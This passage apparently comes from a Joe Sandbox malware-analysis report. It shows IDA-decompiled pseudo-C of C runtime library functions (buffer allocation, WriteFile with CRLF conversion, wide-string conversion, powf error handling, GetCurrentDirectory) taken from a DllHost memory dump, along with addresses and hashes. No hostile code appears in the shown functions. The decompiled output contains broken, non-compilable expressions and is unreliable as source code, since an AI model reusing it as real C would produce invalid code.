				_v32 = __rbp;
				_v40 = __rdi;
				if ( *((long long*)(__r8 + 0x18)) - 0x10 < 0) goto 0x191bb78c;
				_t69 = _t75 + 0xf;
				 *((long long*)(__rcx)) = __rdx;
				 *((long long*)(__rcx + 0x10)) = __rdx;
				 *((long long*)(__rcx + 0x18)) = __rdx;
				if (_t69 - __rdi <= 0) goto 0x191bb823;
				if ((_t69 | 0x0000000f) - 0xffffffff <= 0) goto 0x191bb7bb;
				goto 0x191bb7c7;
				_t65 =  <  ? 0xffffffff - _t75 : 0xffffffff;
				_t56 =  <  ? 0xffffffff : _t65 + 1;
				if (_t56 - 0x1000 < 0) goto 0x191bb80e;
				_t10 = _t56 + 0x27; // 0x8000000000000025
				_t43 = _t10;
				if (_t43 - _t56 <= 0) goto 0x191bb890;
				_t57 = _t43;
				E00007FF77FF7191D23D8(_t43, _t57);
				if (_t43 == 0) goto 0x191bb884;
				_t11 = _t43 + 0x27; // 0x27
				 *((long long*)((_t11 & 0xffffffe0) - 8)) = _t43;
				goto 0x191bb820;
				if (_t57 == 0) goto 0x191bb81d;
				_t25 = E00007FF77FF7191D23D8(_t43, _t57);
				goto 0x191bb820;
				 *_t67 = __rdx;
				 *(_t67 + 0x10) = _t69;
				 *((long long*)(_t67 + 0x18)) = _t65;
				asm("movsd xmm0, [0x5434f]");
				asm("movsd [ebx], xmm0");
				_t26 = M00007FF77FF71920FB90; // 0x61446d61
				 *((intOrPtr*)(__rdx + 8)) = _t26;
				 *((short*)(__rdx + 0xc)) =  *0x1920fb94 & 0x0000ffff;
				 *((char*)(__rdx + 0xe)) =  *0x1920fb96 & 0x000000ff;
				E00007FF77FF7191D4380();
				 *((char*)(__rdx + _t69)) = 0;
				return _t25;
			}















                                                                                                                                                              0x7ff7191bb74a
                                                                                                                                                              0x7ff7191bb74e
                                                                                                                                                              0x7ff7191bb751
                                                                                                                                                              0x7ff7191bb76d
                                                                                                                                                              0x7ff7191bb778
                                                                                                                                                              0x7ff7191bb77d
                                                                                                                                                              0x7ff7191bb782
                                                                                                                                                              0x7ff7191bb787
                                                                                                                                                              0x7ff7191bb78e
                                                                                                                                                              0x7ff7191bb797
                                                                                                                                                              0x7ff7191bb79a
                                                                                                                                                              0x7ff7191bb7a1
                                                                                                                                                              0x7ff7191bb7a8
                                                                                                                                                              0x7ff7191bb7b4
                                                                                                                                                              0x7ff7191bb7b9
                                                                                                                                                              0x7ff7191bb7c3
                                                                                                                                                              0x7ff7191bb7d5
                                                                                                                                                              0x7ff7191bb7e0
                                                                                                                                                              0x7ff7191bb7e2
                                                                                                                                                              0x7ff7191bb7e2
                                                                                                                                                              0x7ff7191bb7e9
                                                                                                                                                              0x7ff7191bb7ef
                                                                                                                                                              0x7ff7191bb7f2
                                                                                                                                                              0x7ff7191bb7fa
                                                                                                                                                              0x7ff7191bb800
                                                                                                                                                              0x7ff7191bb808
                                                                                                                                                              0x7ff7191bb80c
                                                                                                                                                              0x7ff7191bb811
                                                                                                                                                              0x7ff7191bb813
                                                                                                                                                              0x7ff7191bb81b
                                                                                                                                                              0x7ff7191bb820
                                                                                                                                                              0x7ff7191bb823
                                                                                                                                                              0x7ff7191bb82a
                                                                                                                                                              0x7ff7191bb831
                                                                                                                                                              0x7ff7191bb839
                                                                                                                                                              0x7ff7191bb83d
                                                                                                                                                              0x7ff7191bb843
                                                                                                                                                              0x7ff7191bb84d
                                                                                                                                                              0x7ff7191bb858
                                                                                                                                                              0x7ff7191bb85f
                                                                                                                                                              0x7ff7191bb86c
                                                                                                                                                              0x7ff7191bb883

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: amData\
                                                                                                                                                              • API String ID: 73155330-1743613425
                                                                                                                                                              • Opcode ID: 166bbe10d734689c822bb0402666427f85af33b994acebec53c7dad649b92663
                                                                                                                                                              • Instruction ID: f6136140fc6dc59f3f9faa034cc2f430a61b2ad6474dccb79975ed6fc571fd18
                                                                                                                                                              • Opcode Fuzzy Hash: 166bbe10d734689c822bb0402666427f85af33b994acebec53c7dad649b92663
                                                                                                                                                              • Instruction Fuzzy Hash: 9731C332A09F4585FA24AF11B404179B2B1FB08BF8F584635DABE07BD5DE3CD1869350
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E65F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 33%
                                                                                                                                                              			E00007FF77FF7191E65F0(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, void* __r10, void* __r11, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				void* _t91;
				void* _t102;
				void* _t103;

				_a8 = __rbx;
				_a24 = __rbp;
				E00007FF77FF7191D2CC0(0x1470, __rax, __r10, __r11);
				_t62 =  *0x192190a0; // 0x590452ce5669
				_a5176 = _t62 ^ _t91 - __rax;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t103 = _t102 + __r8;
				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x1921b700 + (__edx >> 6) * 8));
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t103 >= 0) goto 0x191e6731;
				_t67 =  &_a40;
				if (__r8 - _t103 >= 0) goto 0x191e669a;
				_t41 =  *__r8 & 0x0000ffff;
				if (_t41 != 0xa) goto 0x191e6686;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x191e6668;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E00007FF77FF7191EB214();
				if (0 == 0) goto 0x191e6729;
				if (0 == 0) goto 0x191e6719;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x191e6729;
				if (0 + _a24 < 0) goto 0x191e66e6;
				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
				goto 0x191e665d;
				 *((intOrPtr*)(__rcx)) = GetLastError();
				return E00007FF77FF7191D23B0(_t39, 0, _a5176 ^ _t91 - __rax);
			}












                                                                                                                                                              0x7ff7191e65f0
                                                                                                                                                              0x7ff7191e65f5
                                                                                                                                                              0x7ff7191e6607
                                                                                                                                                              0x7ff7191e660f
                                                                                                                                                              0x7ff7191e6619
                                                                                                                                                              0x7ff7191e662a
                                                                                                                                                              0x7ff7191e6638
                                                                                                                                                              0x7ff7191e663c
                                                                                                                                                              0x7ff7191e6654
                                                                                                                                                              0x7ff7191e665a
                                                                                                                                                              0x7ff7191e665d
                                                                                                                                                              0x7ff7191e6663
                                                                                                                                                              0x7ff7191e666b
                                                                                                                                                              0x7ff7191e666d
                                                                                                                                                              0x7ff7191e6678
                                                                                                                                                              0x7ff7191e667f
                                                                                                                                                              0x7ff7191e6682
                                                                                                                                                              0x7ff7191e6686
                                                                                                                                                              0x7ff7191e6698
                                                                                                                                                              0x7ff7191e669a
                                                                                                                                                              0x7ff7191e66a5
                                                                                                                                                              0x7ff7191e66b3
                                                                                                                                                              0x7ff7191e66c6
                                                                                                                                                              0x7ff7191e66cb
                                                                                                                                                              0x7ff7191e66d5
                                                                                                                                                              0x7ff7191e66de
                                                                                                                                                              0x7ff7191e66e4
                                                                                                                                                              0x7ff7191e66e6
                                                                                                                                                              0x7ff7191e66fb
                                                                                                                                                              0x7ff7191e6704
                                                                                                                                                              0x7ff7191e670f
                                                                                                                                                              0x7ff7191e6717
                                                                                                                                                              0x7ff7191e671e
                                                                                                                                                              0x7ff7191e6724
                                                                                                                                                              0x7ff7191e672f
                                                                                                                                                              0x7ff7191e675f

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                              • String ID: U
                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                              • Opcode ID: 8784abe35501bf7c6ace227215c306902726a7b9a16041936dd4e58c3eb03d5e
                                                                                                                                                              • Instruction ID: 7dd810ba24eb3a9d254899a4be4215ff24ce067fe35eb7e2093f1194539830a1
                                                                                                                                                              • Opcode Fuzzy Hash: 8784abe35501bf7c6ace227215c306902726a7b9a16041936dd4e58c3eb03d5e
                                                                                                                                                              • Instruction Fuzzy Hash: 8641C232A18A4182EB11AF25F4443A9A7B0FB887E8FC04431EE4D87794DF3CD446D720
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EC094 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 67%
                                                                                                                                                              			E00007FF77FF7191EC094(void* __esi, intOrPtr* __rax, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, signed int __r8, void* __r9, long long _a8, long long _a16, long long _a24, long long _a40, intOrPtr _a48) {
				intOrPtr _v32;
				char _v48;
				char _v56;
				intOrPtr* _t50;
				intOrPtr* _t51;
				intOrPtr* _t63;
				long long _t72;
				long long _t76;

				_t53 = __rbx;
				_t50 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				r12d = 0;
				_t63 = __rdx;
				if (__rdx != 0) goto 0x191ec110;
				if (__r8 != 0) goto 0x191ec115;
				if (__rdx == 0) goto 0x191ec0d2;
				 *__rdx = r12w;
				if (__rcx == 0) goto 0x191ec0da;
				 *__rcx = _t76;
				E00007FF77FF7191D86F4(__rax, __rbx,  &_v56, _a48, __r8);
				_t72 = _a40;
				_t73 =  >  ? __r8 : _t72;
				_t40 = ( >  ? __r8 : _t72) - 0x7fffffff;
				if (( >  ? __r8 : _t72) - 0x7fffffff <= 0) goto 0x191ec12b;
				E00007FF77FF7191DC854(_t50);
				goto 0x191ec179;
				if (__r8 != 0) goto 0x191ec0c9;
				E00007FF77FF7191DC854(_t50);
				 *_t50 = 0x16;
				E00007FF77FF7191DA5D8();
				goto 0x191ec1ab;
				E00007FF77FF7191EBE90(__esi, _t50, _t53, _t63, __r9, __r8,  >  ? __r8 : _t72,  &_v48);
				if (_t50 != 0xffffffff) goto 0x191ec153;
				if (_t63 == 0) goto 0x191ec14a;
				 *_t63 = r12w;
				E00007FF77FF7191DC854(_t50);
				goto 0x191ec198;
				_t51 = _t50 + 1;
				if (_t63 == 0) goto 0x191ec190;
				if (_t51 - __r8 <= 0) goto 0x191ec18a;
				if (_a40 == 0xffffffff) goto 0x191ec182;
				 *_t63 = r12w;
				E00007FF77FF7191DC854(_t51);
				 *_t51 = 0x22;
				E00007FF77FF7191DA5D8();
				goto 0x191ec198;
				 *((intOrPtr*)(_t63 + __r8 * 2 - 2)) = r12w;
				if (__rcx == 0) goto 0x191ec198;
				 *__rcx = __r8;
				if (_v32 == r12b) goto 0x191ec1ab;
				 *(_v56 + 0x3a8) =  *(_v56 + 0x3a8) & 0xfffffffd;
				return 0x50;
			}











                                                                                                                                                              0x7ff7191ec094
                                                                                                                                                              0x7ff7191ec094
                                                                                                                                                              0x7ff7191ec094
                                                                                                                                                              0x7ff7191ec099
                                                                                                                                                              0x7ff7191ec09e
                                                                                                                                                              0x7ff7191ec0ad
                                                                                                                                                              0x7ff7191ec0b6
                                                                                                                                                              0x7ff7191ec0c2
                                                                                                                                                              0x7ff7191ec0c7
                                                                                                                                                              0x7ff7191ec0cc
                                                                                                                                                              0x7ff7191ec0ce
                                                                                                                                                              0x7ff7191ec0d5
                                                                                                                                                              0x7ff7191ec0d7
                                                                                                                                                              0x7ff7191ec0e7
                                                                                                                                                              0x7ff7191ec0ec
                                                                                                                                                              0x7ff7191ec0f7
                                                                                                                                                              0x7ff7191ec0fb
                                                                                                                                                              0x7ff7191ec102
                                                                                                                                                              0x7ff7191ec104
                                                                                                                                                              0x7ff7191ec10e
                                                                                                                                                              0x7ff7191ec113
                                                                                                                                                              0x7ff7191ec115
                                                                                                                                                              0x7ff7191ec11f
                                                                                                                                                              0x7ff7191ec121
                                                                                                                                                              0x7ff7191ec126
                                                                                                                                                              0x7ff7191ec136
                                                                                                                                                              0x7ff7191ec13f
                                                                                                                                                              0x7ff7191ec144
                                                                                                                                                              0x7ff7191ec146
                                                                                                                                                              0x7ff7191ec14a
                                                                                                                                                              0x7ff7191ec151
                                                                                                                                                              0x7ff7191ec153
                                                                                                                                                              0x7ff7191ec159
                                                                                                                                                              0x7ff7191ec15e
                                                                                                                                                              0x7ff7191ec169
                                                                                                                                                              0x7ff7191ec16b
                                                                                                                                                              0x7ff7191ec16f
                                                                                                                                                              0x7ff7191ec179
                                                                                                                                                              0x7ff7191ec17b
                                                                                                                                                              0x7ff7191ec180
                                                                                                                                                              0x7ff7191ec18a
                                                                                                                                                              0x7ff7191ec193
                                                                                                                                                              0x7ff7191ec195
                                                                                                                                                              0x7ff7191ec19d
                                                                                                                                                              0x7ff7191ec1a4
                                                                                                                                                              0x7ff7191ec1c6

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: 123
                                                                                                                                                              • API String ID: 3215553584-2286445522
                                                                                                                                                              • Opcode ID: 197765336227ce6d74bb465400ab26fa7ec5dcf5122b1c6d9b74055baa487a5d
                                                                                                                                                              • Instruction ID: ee0c8c7c63cc8e44b35bb3195f1cb456b9c9b07b95d81373f45b2ae5c8f07c93
                                                                                                                                                              • Opcode Fuzzy Hash: 197765336227ce6d74bb465400ab26fa7ec5dcf5122b1c6d9b74055baa487a5d
                                                                                                                                                              • Instruction Fuzzy Hash: 6C31C771E08B4283FA62AF11B940279D2B0BF447B8F844230DA6D17BD5CE3DE49BA710
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EC9D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                              			E00007FF77FF7191EC9D4() {
				intOrPtr _t35;
				void* _t36;
				void* _t37;
				void* _t41;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t52;

				_t47 = _t51;
				_t50 = _t47 - 0x5f;
				_t52 = _t51 - 0x90;
				asm("movaps [eax-0x18], xmm6");
				asm("movaps xmm6, xmm2");
				if (r9d == 1) goto 0x191ecb0c;
				_t41 = r9d - 2;
				if (_t41 == 0) goto 0x191ecad9;
				if (_t41 <= 0) goto 0x191ecb4b;
				if (r9d - 5 <= 0) goto 0x191ecaca;
				if (r9d == 6) goto 0x191eca9c;
				if (r9d == 7) goto 0x191eca63;
				if (r9d != 9) goto 0x191ecb4b;
				 *(_t50 + 0x17) =  *(_t50 + 0x17) & 0x00000000;
				_t4 = _t47 + 1; // 0x3
				r9d = _t4;
				 *((intOrPtr*)(_t52 + 0x40)) = 2;
				asm("movss [esp+0x38], xmm1");
				asm("movss [esp+0x30], xmm0");
				 *(_t52 + 0x28) = 0x22;
				asm("movss [ebp+0x17], xmm6");
				 *((intOrPtr*)(_t52 + 0x20)) = 0x11;
				goto 0x191ecb3a;
				 *(_t50 + 0x1f) =  *(_t50 + 0x1f) & 0x00000000;
				r9d = 4;
				 *((intOrPtr*)(_t52 + 0x40)) = 2;
				asm("movss [esp+0x38], xmm1");
				asm("movss [esp+0x30], xmm0");
				 *(_t52 + 0x28) = 0x22;
				asm("movss [ebp+0x1f], xmm6");
				 *((intOrPtr*)(_t52 + 0x20)) = 0x12;
				goto 0x191ecb3a;
				 *(_t50 + 0x27) =  *(_t50 + 0x27) & 0x00000000;
				r9d = 1;
				 *((intOrPtr*)(_t52 + 0x40)) = 2;
				asm("movss [esp+0x38], xmm1");
				asm("movss [esp+0x30], xmm0");
				asm("movss [ebp+0x27], xmm6");
				 *(_t52 + 0x28) = 0x21;
				goto 0x191ecb32;
				asm("movss [ebp+0x7f], xmm6");
				_t35 = E00007FF77FF7191F4CC0(2,  *((intOrPtr*)(_t50 + 0x7f)));
				goto 0x191ecb4e;
				 *(_t50 + 0x2f) =  *(_t50 + 0x2f) & 0x00000000;
				r9d = _t35;
				 *((intOrPtr*)(_t52 + 0x40)) = _t35;
				asm("movss [esp+0x38], xmm1");
				asm("movss [esp+0x30], xmm0");
				 *(_t52 + 0x28) = 0x22;
				asm("movss [ebp+0x2f], xmm6");
				 *((intOrPtr*)(_t52 + 0x20)) = 4;
				goto 0x191ecb3a;
				 *(_t50 + 0x37) =  *(_t50 + 0x37) & 0x00000000;
				 *((intOrPtr*)(_t52 + 0x40)) = _t35;
				asm("movss [esp+0x38], xmm1");
				asm("movss [esp+0x30], xmm0");
				 *(_t52 + 0x28) =  *(_t52 + 0x28) & 0x00000000;
				asm("movss [ebp+0x37], xmm6");
				r9d = 0;
				 *((intOrPtr*)(_t52 + 0x20)) = 8;
				_t36 = E00007FF77FF7191F4B70(_t37, 0x1d, r9d, 0x19209660, _t49,  *(_t50 + 0x37));
				asm("movaps xmm0, xmm6");
				asm("movaps xmm6, [esp+0x80]");
				return _t36;
			}












                                                                                                                                                              0x7ff7191ec9d4
                                                                                                                                                              0x7ff7191ec9d8
                                                                                                                                                              0x7ff7191ec9dc
                                                                                                                                                              0x7ff7191ec9e3
                                                                                                                                                              0x7ff7191ec9e7
                                                                                                                                                              0x7ff7191ec9f3
                                                                                                                                                              0x7ff7191ec9f9
                                                                                                                                                              0x7ff7191ec9fc
                                                                                                                                                              0x7ff7191eca02
                                                                                                                                                              0x7ff7191eca0c
                                                                                                                                                              0x7ff7191eca16
                                                                                                                                                              0x7ff7191eca20
                                                                                                                                                              0x7ff7191eca26
                                                                                                                                                              0x7ff7191eca2c
                                                                                                                                                              0x7ff7191eca31
                                                                                                                                                              0x7ff7191eca31
                                                                                                                                                              0x7ff7191eca35
                                                                                                                                                              0x7ff7191eca39
                                                                                                                                                              0x7ff7191eca3f
                                                                                                                                                              0x7ff7191eca45
                                                                                                                                                              0x7ff7191eca4d
                                                                                                                                                              0x7ff7191eca56
                                                                                                                                                              0x7ff7191eca5e
                                                                                                                                                              0x7ff7191eca63
                                                                                                                                                              0x7ff7191eca68
                                                                                                                                                              0x7ff7191eca6e
                                                                                                                                                              0x7ff7191eca72
                                                                                                                                                              0x7ff7191eca78
                                                                                                                                                              0x7ff7191eca7e
                                                                                                                                                              0x7ff7191eca86
                                                                                                                                                              0x7ff7191eca8f
                                                                                                                                                              0x7ff7191eca97
                                                                                                                                                              0x7ff7191eca9c
                                                                                                                                                              0x7ff7191ecaa1
                                                                                                                                                              0x7ff7191ecaa7
                                                                                                                                                              0x7ff7191ecaab
                                                                                                                                                              0x7ff7191ecab1
                                                                                                                                                              0x7ff7191ecab7
                                                                                                                                                              0x7ff7191ecac0
                                                                                                                                                              0x7ff7191ecac8
                                                                                                                                                              0x7ff7191ecaca
                                                                                                                                                              0x7ff7191ecad2
                                                                                                                                                              0x7ff7191ecad7
                                                                                                                                                              0x7ff7191ecad9
                                                                                                                                                              0x7ff7191ecade
                                                                                                                                                              0x7ff7191ecae1
                                                                                                                                                              0x7ff7191ecae5
                                                                                                                                                              0x7ff7191ecaeb
                                                                                                                                                              0x7ff7191ecaf1
                                                                                                                                                              0x7ff7191ecaf9
                                                                                                                                                              0x7ff7191ecb02
                                                                                                                                                              0x7ff7191ecb0a
                                                                                                                                                              0x7ff7191ecb0c
                                                                                                                                                              0x7ff7191ecb11
                                                                                                                                                              0x7ff7191ecb15
                                                                                                                                                              0x7ff7191ecb1b
                                                                                                                                                              0x7ff7191ecb21
                                                                                                                                                              0x7ff7191ecb26
                                                                                                                                                              0x7ff7191ecb2b
                                                                                                                                                              0x7ff7191ecb32
                                                                                                                                                              0x7ff7191ecb46
                                                                                                                                                              0x7ff7191ecb4b
                                                                                                                                                              0x7ff7191ecb4e
                                                                                                                                                              0x7ff7191ecb5e

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _handle_errorf
                                                                                                                                                              • String ID: "$powf
                                                                                                                                                              • API String ID: 2315412904-603753351
                                                                                                                                                              • Opcode ID: 2fd99ede9f727ad468451214f46e480e14a4ac1394bb756aec66fcfc7979fa05
                                                                                                                                                              • Instruction ID: a2400c008730c91215ec42987cd62fd5497505072c1a587a81bbf2269faec6a5
                                                                                                                                                              • Opcode Fuzzy Hash: 2fd99ede9f727ad468451214f46e480e14a4ac1394bb756aec66fcfc7979fa05
                                                                                                                                                              • Instruction Fuzzy Hash: 6F415F73D28A808BE370CF22E4847AAF6B0F79939CF101325F74912994DB7DC595AB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EA798 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                              			E00007FF77FF7191EA798(long long __rbx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a16) {
				void* _v8;
				signed int _v24;
				short _v550;
				signed int _v552;
				void* _t17;
				signed long long _t54;
				signed long long _t55;
				signed short* _t57;
				signed short* _t59;
				void* _t68;

				_a8 = __rbx;
				_a16 = __rsi;
				_t54 =  *0x192190a0; // 0x590452ce5669
				_t55 = _t54 ^ _t68 - 0x00000240;
				_v24 = _t55;
				_t59 =  &_v552;
				r8d = 0x20a;
				E00007FF77FF7191D4A30(_t17, 0, _t59, __rdx, __r8);
				if (GetCurrentDirectoryW(??, ??) - 0x104 > 0) goto 0x191ea80d;
				if ((_v552 & 0x0000ffff) == 0) goto 0x191ea86c;
				if (_v550 != 0x3a) goto 0x191ea86c;
				if (_t59 - 0x61 - 0x19 > 0) goto 0x191ea808;
				goto 0x191ea86c;
				_t10 = _t55 + 1; // 0x1
				E00007FF77FF7191E7598((_v552 & 0xffff) - 0x20, _t59,  &_v552);
				_t57 = _t55;
				if (_t55 == 0) goto 0x191ea835;
				if (GetCurrentDirectoryW(??, ??) != 0) goto 0x191ea842;
				E00007FF77FF7191DC854(_t55);
				 *_t55 = 0xc;
				goto 0x191ea864;
				if ( *_t57 == 0) goto 0x191ea864;
				if (_t57[1] != 0x3a) goto 0x191ea864;
				if (( *_t57 & 0x0000ffff) - 0x61 - 0x19 > 0) goto 0x191ea861;
				_t12 = _t55 - 0x40; // -193
				E00007FF77FF7191E6B28(_t55, _t57);
				return E00007FF77FF7191D23B0(_t12, _t10, _v24 ^ _t68 - 0x00000240);
			}













                                                                                                                                                              0x7ff7191ea798
                                                                                                                                                              0x7ff7191ea79d
                                                                                                                                                              0x7ff7191ea7aa
                                                                                                                                                              0x7ff7191ea7b1
                                                                                                                                                              0x7ff7191ea7b4
                                                                                                                                                              0x7ff7191ea7be
                                                                                                                                                              0x7ff7191ea7c3
                                                                                                                                                              0x7ff7191ea7c9
                                                                                                                                                              0x7ff7191ea7e3
                                                                                                                                                              0x7ff7191ea7ef
                                                                                                                                                              0x7ff7191ea7f7
                                                                                                                                                              0x7ff7191ea803
                                                                                                                                                              0x7ff7191ea80b
                                                                                                                                                              0x7ff7191ea80d
                                                                                                                                                              0x7ff7191ea817
                                                                                                                                                              0x7ff7191ea81e
                                                                                                                                                              0x7ff7191ea824
                                                                                                                                                              0x7ff7191ea833
                                                                                                                                                              0x7ff7191ea835
                                                                                                                                                              0x7ff7191ea83a
                                                                                                                                                              0x7ff7191ea840
                                                                                                                                                              0x7ff7191ea845
                                                                                                                                                              0x7ff7191ea84c
                                                                                                                                                              0x7ff7191ea85c
                                                                                                                                                              0x7ff7191ea861
                                                                                                                                                              0x7ff7191ea867
                                                                                                                                                              0x7ff7191ea892

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                              • String ID: :
                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                              • Opcode ID: ab82874d5ed6b2a598765b1a342cad242f235eefb6005fd23b848694f996d126
                                                                                                                                                              • Instruction ID: 26875db05d8f6cdc910ba7bb597081ecf1df9cd2d131b9abc41bcea6ba9fd5c9
                                                                                                                                                              • Opcode Fuzzy Hash: ab82874d5ed6b2a598765b1a342cad242f235eefb6005fd23b848694f996d126
                                                                                                                                                              • Instruction Fuzzy Hash: DF21A923A08A4682FB25BF16B04467DB2B1FB84B59FC44035DA4D57684DF7CE5CBD620
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EC8B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                              			E00007FF77FF7191EC8B0(void* __rax, intOrPtr _a32, intOrPtr _a40, intOrPtr _a64, intOrPtr _a80) {
				void* _v40;
				intOrPtr _v56;
				intOrPtr _v80;
				intOrPtr _v88;
				void* _t17;
				void* _t18;
